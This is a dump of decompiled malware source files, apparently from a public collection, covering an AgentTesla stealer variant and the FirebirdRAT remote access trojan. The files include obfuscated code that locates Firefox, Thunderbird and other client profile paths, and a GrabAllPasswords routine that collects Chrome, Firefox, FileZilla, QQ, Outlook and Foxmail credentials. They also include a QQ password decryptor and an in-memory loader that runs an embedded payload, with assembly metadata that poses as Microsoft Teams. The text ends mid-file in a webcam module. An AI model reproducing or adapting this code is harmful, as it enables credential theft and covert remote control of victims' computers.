--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using Microsoft.VisualBasic.ApplicationServices;
 5 | 
 6 | namespace My
 7 | {
 8 | 	// Token: 0x0200000B RID: 11
 9 | 	[GeneratedCode("MyTemplate", "8.0.0.0")]
10 | 	[EditorBrowsable(EditorBrowsableState.Never)]
11 | 	internal class fq : ApplicationBase
12 | 	{
13 | 	}
14 | }
15 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/fz.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using System.Diagnostics;
 5 | using Microsoft.VisualBasic.Devices;
 6 | 
 7 | namespace My
 8 | {
 9 | 	// Token: 0x0200000C RID: 12
10 | 	[GeneratedCode("MyTemplate", "8.0.0.0")]
11 | 	[EditorBrowsable(EditorBrowsableState.Never)]
12 | 	internal class fz : Computer
13 | 	{
14 | 		// Token: 0x0600003A RID: 58 RVA: 0x000191D4 File Offset: 0x000173D4
15 | 		[EditorBrowsable(EditorBrowsableState.Never)]
16 | 		[DebuggerHidden]
17 | 		public fz()
18 | 		{
19 | 		}
20 | 	}
21 | }
22 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/guw.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using Microsoft.VisualBasic.CompilerServices;
 3 | 
 4 | // Token: 0x0200002F RID: 47
 5 | [StandardModule]
 6 | public sealed class guw
 7 | {
 8 | 	// Token: 0x06000155 RID: 341 RVA: 0x0002E6AC File Offset: 0x0002C8AC
 9 | 	// Note: this type is marked as 'beforefieldinit'.
10 | 	static guw()
11 | 	{
12 | 		for (;;)
13 | 		{
14 | 			IL_112:
15 | 			uint num = 3124930237u;
16 | 			for (;;)
17 | 			{
18 | 				uint num2;
19 | 				switch ((num2 = (num ^ 2554004204u)) % 3u)
20 | 				{
21 | 				case 0u:
22 | 					goto IL_112;
23 | 				case 1u:
24 | 					guw.KMeleon = guw.guq + <Module>.smethod_strings_decryptor(290448 -> "\K-Meleon\"));
25 | 					num = (num2 * 418490941u ^ 3107714807u);
26 | 					continue;
27 | 				}
28 | 				goto Block_1;
29 | 			}
30 | 		}
31 | 		Block_1:
32 | 		guw.IceCat = guw.guq + <Module>.smethod_strings_decryptor(290552 -> "\Mozilla\icecat\"));
33 | 	}
34 | 
35 | 	// Token: 0x040003A0 RID: 928
36 | 	private static string guq = Environment.GetEnvironmentVariable(<Module>.smethod_strings_decryptor(290640 -> "APPDATA")));
37 | 
38 | 	// Token: 0x040003A1 RID: 929
39 | 	public static string Mozilla = guw.guq + <Module>.smethod_strings_decryptor(290744 -> "\Mozilla\Firefox\"));
40 | 
41 | 	// Token: 0x040003A2 RID: 930
42 | 	public static string Postbox = guw.guq + <Module>.smethod_strings_decryptor(290816 -> "\Postbox\"));
43 | 
44 | 	// Token: 0x040003A3 RID: 931
45 | 	public static string Thunderbird = guw.guq + <Module>.smethod_strings_decryptor(290792 -> "\Thunderbird\"));
46 | 
47 | 	// Token: 0x040003A4 RID: 932
48 | 	public static string SeaMonkey = guw.guq + <Module>.smethod_strings_decryptor(290864 -> "\Mozilla\SeaMonkey\"));
49 | 
50 | 	// Token: 0x040003A5 RID: 933
51 | 	public static string Flock = guw.guq + <Module>.smethod_strings_decryptor(290840 -> "\Flock\Browser\"));
52 | 
53 | 	// Token: 0x040003A6 RID: 934
54 | 	public static string BlackHawk = guw.guq + <Module>.smethod_strings_decryptor(290400 -> "\NETGATE Technologies\BlackHawk\"));
55 | 
56 | 	// Token: 0x040003A7 RID: 935
57 | 	public static string CyberFox = guw.guq + <Module>.smethod_strings_decryptor(290504 -> "\8pecxstudios\Cyberfox\"));
58 | 
59 | 	// Token: 0x040003A8 RID: 936
60 | 	public static string KMeleon;
61 | 
62 | 	// Token: 0x040003A9 RID: 937
63 | 	public static string IceCat;
64 | }
65 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mnp.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000045 RID: 69
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 57264)]
6 | internal struct mnp
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mnq.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004E RID: 78
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 144)]
6 | internal struct mnq
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mnr.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000046 RID: 70
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 64)]
6 | internal struct mnr
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mns.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000047 RID: 71
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 80)]
6 | internal struct mns
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mnt.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000048 RID: 72
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 96)]
6 | internal struct mnt
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mnu.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000049 RID: 73
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 128)]
6 | internal struct mnu
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mnv.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004A RID: 74
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 224)]
6 | internal struct mnv
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mnw.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004D RID: 77
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 160)]
6 | internal struct mnw
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mnx.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004C RID: 76
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 176)]
6 | internal struct mnx
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/mny.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004B RID: 75
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 112)]
6 | internal struct mny
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerDll/Dll.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 11.00
 3 | # Visual Studio 2010
 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Dll", "Dll\Dll.csproj", "{F12381B8-81C0-4161-B67E-324BD8B7787E}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Any CPU = Debug|Any CPU
 9 | 		Debug|Mixed Platforms = Debug|Mixed Platforms
10 | 		Debug|x86 = Debug|x86
11 | 		Release|Any CPU = Release|Any CPU
12 | 		Release|Mixed Platforms = Release|Mixed Platforms
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Debug|Any CPU.ActiveCfg = Debug|x86
17 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Debug|Any CPU.Build.0 = Debug|x86
18 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Debug|Mixed Platforms.ActiveCfg = Debug|x86
19 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Debug|Mixed Platforms.Build.0 = Debug|x86
20 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Debug|x86.ActiveCfg = Debug|x86
21 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Debug|x86.Build.0 = Debug|x86
22 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Release|Any CPU.ActiveCfg = Release|x86
23 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Release|Any CPU.Build.0 = Release|x86
24 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Release|Mixed Platforms.ActiveCfg = Release|x86
25 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Release|Mixed Platforms.Build.0 = Release|x86
26 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Release|x86.ActiveCfg = Release|x86
27 | 		{F12381B8-81C0-4161-B67E-324BD8B7787E}.Release|x86.Build.0 = Release|x86
28 | 	EndGlobalSection
29 | 	GlobalSection(SolutionProperties) = preSolution
30 | 		HideSolutionNode = FALSE
31 | 	EndGlobalSection
32 | EndGlobal
33 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerDll/Dll/Dll.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/FirebirdRAT_03_2020/ServerDll/Dll/Dll.resources


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerDll/Dll/InitalizePass.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using Microsoft.VisualBasic.CompilerServices;
 3 | 
 4 | // Token: 0x02000010 RID: 16
 5 | [StandardModule]
 6 | internal sealed class InitalizePass
 7 | {
 8 | 	// Token: 0x060000B0 RID: 176 RVA: 0x0000C440 File Offset: 0x0000A640
 9 | 	public static string GrabAllPasswords()
10 | 	{
11 | 		return Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(ChromeRecover.ChromePass(), FFRecover.GetFFTBPass()), FileZillaRecover.Grab()), QQRecover.RecoverQQ()), OutlookRecover.GetOutlookPasswords()), FoxRecover.GetFoxmail()));
12 | 	}
13 | }
14 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerDll/Dll/PrintClass.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Drawing;
 3 | using System.Drawing.Printing;
 4 | 
 5 | // Token: 0x0200000F RID: 15
 6 | public class PrintClass : PrintDocument
 7 | {
 8 | 	// Token: 0x060000AE RID: 174 RVA: 0x0000C3D8 File Offset: 0x0000A5D8
 9 | 	public PrintClass()
10 | 	{
11 | 		this.PrintVar = string.Empty;
12 | 	}
13 | 
14 | 	// Token: 0x060000AF RID: 175 RVA: 0x0000C3EC File Offset: 0x0000A5EC
15 | 	protected override void OnPrintPage(PrintPageEventArgs e)
16 | 	{
17 | 		base.OnPrintPage(e);
18 | 		Font font = new Font("Arial", 10f, FontStyle.Regular, GraphicsUnit.Point);
19 | 		e.Graphics.DrawString(this.PrintVar, font, Brushes.Black, 0f, 0f);
20 | 		font.Dispose();
21 | 		e.HasMorePages = false;
22 | 	}
23 | 
24 | 	// Token: 0x04000038 RID: 56
25 | 	public string PrintVar;
26 | }
27 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerDll/Dll/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Reflection;
 3 | using System.Runtime.CompilerServices;
 4 | using System.Runtime.InteropServices;
 5 | 
 6 | [assembly: AssemblyVersion("1.4.4.0")]
 7 | [assembly: AssemblyProduct("Microsoft Teams")]
 8 | [assembly: AssemblyCompany("Microsoft Corporation")]
 9 | [assembly: AssemblyDescription("Microsoft Teams")]
10 | [assembly: AssemblyCopyright("Microsoft Corporation")]
11 | [assembly: AssemblyTitle("Microsoft Teams")]
12 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
13 | [assembly: ComVisible(false)]
14 | [assembly: CompilationRelaxations(8)]
15 | [assembly: AssemblyFileVersion("1.4.4.0")]
16 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerDll/Dll/QQRecover.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Security.Cryptography;
 3 | using System.Text;
 4 | using Microsoft.VisualBasic;
 5 | using Microsoft.VisualBasic.CompilerServices;
 6 | 
 7 | // Token: 0x02000013 RID: 19
 8 | [StandardModule]
 9 | internal sealed class QQRecover
10 | {
11 | 	// Token: 0x060000B5 RID: 181 RVA: 0x0000D0A0 File Offset: 0x0000B2A0
12 | 	public static object RecoverQQ()
13 | 	{
14 | 		string text = string.Empty;
15 | 		try
16 | 		{
17 | 			SqLiteHandler sqLiteHandler = new SqLiteHandler(Interaction.Environ("localappdata") + "\\Tencent\\QQBrowser\\User Data\\Default\\EncryptedStorage");
18 | 			sqLiteHandler.ReadTable("entries");
19 | 			int rowCount = sqLiteHandler.GetRowCount();
20 | 			int num = 0;
21 | 			int num2 = rowCount - 1;
22 | 			for (int i = num; i <= num2; i++)
23 | 			{
24 | 				try
25 | 				{
26 | 					if (Operators.CompareString(text, string.Empty, false) == 0)
27 | 					{
28 | 						text += "Tencent QQ: \r\n";
29 | 					}
30 | 					text = text + "URL: " + sqLiteHandler.GetValue(i, "str3") + "\r\n";
31 | 					text = text + "User: " + sqLiteHandler.GetValue(i, "str2") + "\r\n";
32 | 					text = text + "Pass: " + Encoding.UTF8.GetString(ProtectedData.Unprotect(Encoding.Default.GetBytes(sqLiteHandler.GetValue(i, "blob0")), null, DataProtectionScope.CurrentUser)) + "\r\n\r\n";
33 | 				}
34 | 				catch (Exception ex)
35 | 				{
36 | 				}
37 | 			}
38 | 			if (Operators.CompareString(text, string.Empty, false) != 0)
39 | 			{
40 | 				text += "\r\n";
41 | 			}
42 | 		}
43 | 		catch (Exception ex2)
44 | 		{
45 | 		}
46 | 		return text;
47 | 	}
48 | }
49 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerDll/Dll/app.manifest:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
 2 | <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
 3 |   <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
 4 |   <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
 5 |     <security>
 6 |       <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
 7 |         <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
 8 |       </requestedPrivileges>
 9 |     </security>
10 |   </trustInfo>
11 | </assembly>
12 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerLoader/DEDICATEDTOGODREAL1.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 11.00
 3 | # Visual Studio 2010
 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DEDICATEDTOGODREAL1", "DEDICATEDTOGODREAL1\DEDICATEDTOGODREAL1.csproj", "{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Any CPU = Debug|Any CPU
 9 | 		Debug|Mixed Platforms = Debug|Mixed Platforms
10 | 		Debug|x86 = Debug|x86
11 | 		Release|Any CPU = Release|Any CPU
12 | 		Release|Mixed Platforms = Release|Mixed Platforms
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Debug|Any CPU.ActiveCfg = Debug|x86
17 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Debug|Any CPU.Build.0 = Debug|x86
18 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Debug|Mixed Platforms.ActiveCfg = Debug|x86
19 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Debug|Mixed Platforms.Build.0 = Debug|x86
20 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Debug|x86.ActiveCfg = Debug|x86
21 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Debug|x86.Build.0 = Debug|x86
22 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Release|Any CPU.ActiveCfg = Release|x86
23 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Release|Any CPU.Build.0 = Release|x86
24 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Release|Mixed Platforms.ActiveCfg = Release|x86
25 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Release|Mixed Platforms.Build.0 = Release|x86
26 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Release|x86.ActiveCfg = Release|x86
27 | 		{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}.Release|x86.Build.0 = Release|x86
28 | 	EndGlobalSection
29 | 	GlobalSection(SolutionProperties) = preSolution
30 | 		HideSolutionNode = FALSE
31 | 	EndGlobalSection
32 | EndGlobal
33 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerLoader/DEDICATEDTOGODREAL1/DEDICATEDTOGODREAL1.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <PropertyGroup>
 4 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 5 |     <Platform Condition=" '$(Platform)' == '' ">x86</Platform>
 6 |     <ProjectGuid>{E86CE7A0-3DDF-4ECA-B5C0-414A04E227DF}</ProjectGuid>
 7 |     <OutputType>WinExe</OutputType>
 8 |     <AppDesignerFolder>Properties</AppDesignerFolder>
 9 |     <RootNamespace>DEDICATEDTOGODREAL1</RootNamespace>
10 |     <AssemblyName>DEDICATEDTOGODREAL1</AssemblyName>
11 |     <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <ApplicationManifest>app.manifest</ApplicationManifest>
14 |     <StartupObject>Server</StartupObject>
15 |   </PropertyGroup>
16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x86' ">
17 |     <PlatformTarget>x86</PlatformTarget>
18 |     <DebugSymbols>true</DebugSymbols>
19 |     <DebugType>full</DebugType>
20 |     <Optimize>false</Optimize>
21 |     <OutputPath>bin\Debug\</OutputPath>
22 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
23 |     <ErrorReport>prompt</ErrorReport>
24 |     <WarningLevel>4</WarningLevel>
25 |   </PropertyGroup>
26 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
27 |     <PlatformTarget>x86</PlatformTarget>
28 |     <DebugType>pdbonly</DebugType>
29 |     <Optimize>true</Optimize>
30 |     <OutputPath>bin\Release\</OutputPath>
31 |     <DefineConstants>TRACE</DefineConstants>
32 |     <ErrorReport>prompt</ErrorReport>
33 |     <WarningLevel>4</WarningLevel>
34 |   </PropertyGroup>
35 |   <ItemGroup>
36 |     <Reference Include="Microsoft.VisualBasic" />
37 |     <Reference Include="System" />
38 |     <Reference Include="System.Windows.Forms" />
39 |   </ItemGroup>
40 |   <ItemGroup>
41 |     <AppDesigner Include="Properties\" />
42 |   </ItemGroup>
43 |   <ItemGroup>
44 |     <Compile Include="Properties\AssemblyInfo.cs" />
45 |     <Compile Include="Server.cs" />
46 |   </ItemGroup>
47 |   <ItemGroup>
48 |     <EmbeddedResource Include="Dll1.resources" />
49 |   </ItemGroup>
50 |   <ItemGroup>
51 |     <None Include="app.manifest" />
52 |   </ItemGroup>
53 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
54 | </Project>


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerLoader/DEDICATEDTOGODREAL1/Dll1.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/FirebirdRAT_03_2020/ServerLoader/DEDICATEDTOGODREAL1/Dll1.resources


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerLoader/DEDICATEDTOGODREAL1/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Reflection;
 3 | using System.Runtime.CompilerServices;
 4 | using System.Runtime.InteropServices;
 5 | 
 6 | [assembly: AssemblyVersion("1.4.4.0")]
 7 | [assembly: ComVisible(false)]
 8 | [assembly: AssemblyDescription("Microsoft Teams")]
 9 | [assembly: CompilationRelaxations(8)]
10 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
11 | [assembly: AssemblyFileVersion("1.4.4.0")]
12 | [assembly: AssemblyTitle("Microsoft Teams")]
13 | [assembly: AssemblyCopyright("Microsoft Corporation")]
14 | [assembly: AssemblyProduct("Microsoft Teams")]
15 | [assembly: AssemblyCompany("Microsoft Corporation")]
16 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerLoader/DEDICATEDTOGODREAL1/Server.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.IO;
 3 | using System.IO.Compression;
 4 | using System.Resources;
 5 | using System.Runtime.InteropServices;
 6 | using System.Windows.Forms;
 7 | using Microsoft.VisualBasic.CompilerServices;
 8 | 
 9 | // Token: 0x02000002 RID: 2
10 | [StandardModule]
11 | internal sealed class Server
12 | {
13 | 	// Token: 0x06000001 RID: 1
14 | 	[DllImport("kernel32.dll", EntryPoint = "Sleep", SetLastError = true)]
15 | 	public static extern void SleepThread(int ms);
16 | 
17 | 	// Token: 0x06000002 RID: 2 RVA: 0x00002050 File Offset: 0x00002050
18 | 	[STAThread]
19 | 	public static void Main()
20 | 	{
21 | 		Server.enet();
22 | 	}
23 | 
24 | 	// Token: 0x06000003 RID: 3 RVA: 0x00002058 File Offset: 0x00002058
25 | 	public static void enet()
26 | 	{
27 | 		try
28 | 		{
29 | 			byte[] buffer = (byte[])new ResourceManager("Dll1", typeof(Server).Assembly).GetObject("Dll1");
30 | 			using (GZipStream gzipStream = new GZipStream(new MemoryStream(buffer), CompressionMode.Decompress))
31 | 			{
32 | 				byte[] array = new byte[4096];
33 | 				using (MemoryStream memoryStream = new MemoryStream())
34 | 				{
35 | 					int num;
36 | 					do
37 | 					{
38 | 						num = gzipStream.Read(array, 0, 4096);
39 | 						if (num > 0)
40 | 						{
41 | 							memoryStream.Write(array, 0, num);
42 | 						}
43 | 					}
44 | 					while (num > 0);
45 | 					AppDomain.CurrentDomain.Load(memoryStream.ToArray()).EntryPoint.Invoke(null, null);
46 | 				}
47 | 			}
48 | 		}
49 | 		catch (Exception ex)
50 | 		{
51 | 			MessageBox.Show("Welcome! " + ex.Message);
52 | 		}
53 | 	}
54 | }
55 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/ServerLoader/DEDICATEDTOGODREAL1/app.manifest:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
 2 | <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
 3 |   <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
 4 |   <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
 5 |     <security>
 6 |       <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
 7 |         <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
 8 |       </requestedPrivileges>
 9 |     </security>
10 |   </trustInfo>
11 | </assembly>
12 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 11.00
 3 | # Visual Studio 2010
 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WebcamDll", "WebcamDll\WebcamDll.csproj", "{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Any CPU = Debug|Any CPU
 9 | 		Debug|Mixed Platforms = Debug|Mixed Platforms
10 | 		Debug|x86 = Debug|x86
11 | 		Release|Any CPU = Release|Any CPU
12 | 		Release|Mixed Platforms = Release|Mixed Platforms
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Debug|Any CPU.ActiveCfg = Debug|x86
17 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Debug|Any CPU.Build.0 = Debug|x86
18 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Debug|Mixed Platforms.ActiveCfg = Debug|x86
19 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Debug|Mixed Platforms.Build.0 = Debug|x86
20 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Debug|x86.ActiveCfg = Debug|x86
21 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Debug|x86.Build.0 = Debug|x86
22 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Release|Any CPU.ActiveCfg = Release|x86
23 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Release|Any CPU.Build.0 = Release|x86
24 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Release|Mixed Platforms.ActiveCfg = Release|x86
25 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Release|Mixed Platforms.Build.0 = Release|x86
26 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Release|x86.ActiveCfg = Release|x86
27 | 		{AFD6E27A-FF2D-44B6-BA7F-218438477F9D}.Release|x86.Build.0 = Release|x86
28 | 	EndGlobalSection
29 | 	GlobalSection(SolutionProperties) = preSolution
30 | 		HideSolutionNode = FALSE
31 | 	EndGlobalSection
32 | EndGlobal
33 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/FilterCategory.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow
 5 | {
 6 | 	// Token: 0x0200000D RID: 13
 7 | 	[ComVisible(false)]
 8 | 	public static class FilterCategory
 9 | 	{
10 | 		// Token: 0x04000012 RID: 18
11 | 		public static readonly Guid AudioInputDevice = new Guid(869902178u, 37064, 4560, 189, 67, 0, 160, 201, 17, 206, 134);
12 | 
13 | 		// Token: 0x04000013 RID: 19
14 | 		public static readonly Guid VideoInputDevice = new Guid(2248913680u, 23809, 4560, 189, 59, 0, 160, 201, 17, 206, 134);
15 | 
16 | 		// Token: 0x04000014 RID: 20
17 | 		public static readonly Guid VideoCompressorCategory = new Guid(869902176u, 37064, 4560, 189, 67, 0, 160, 201, 17, 206, 134);
18 | 
19 | 		// Token: 0x04000015 RID: 21
20 | 		public static readonly Guid AudioCompressorCategory = new Guid(869902177u, 37064, 4560, 189, 67, 0, 160, 201, 17, 206, 134);
21 | 	}
22 | }
23 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/FilterInfoCollection.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections;
 3 | using System.Runtime.InteropServices;
 4 | using System.Runtime.InteropServices.ComTypes;
 5 | using AForge.Video.DirectShow.Internals;
 6 | 
 7 | namespace AForge.Video.DirectShow
 8 | {
 9 | 	// Token: 0x0200000B RID: 11
10 | 	public class FilterInfoCollection : CollectionBase
11 | 	{
12 | 		// Token: 0x06000022 RID: 34 RVA: 0x00002413 File Offset: 0x00000613
13 | 		public FilterInfoCollection(Guid category)
14 | 		{
15 | 			this.CollectFilters(category);
16 | 		}
17 | 
18 | 		// Token: 0x17000004 RID: 4
19 | 		public FilterInfo this[int index]
20 | 		{
21 | 			get
22 | 			{
23 | 				return (FilterInfo)base.InnerList[index];
24 | 			}
25 | 		}
26 | 
27 | 		// Token: 0x06000024 RID: 36 RVA: 0x00002438 File Offset: 0x00000638
28 | 		private void CollectFilters(Guid category)
29 | 		{
30 | 			object obj = null;
31 | 			IEnumMoniker enumMoniker = null;
32 | 			IMoniker[] array = new IMoniker[1];
33 | 			try
34 | 			{
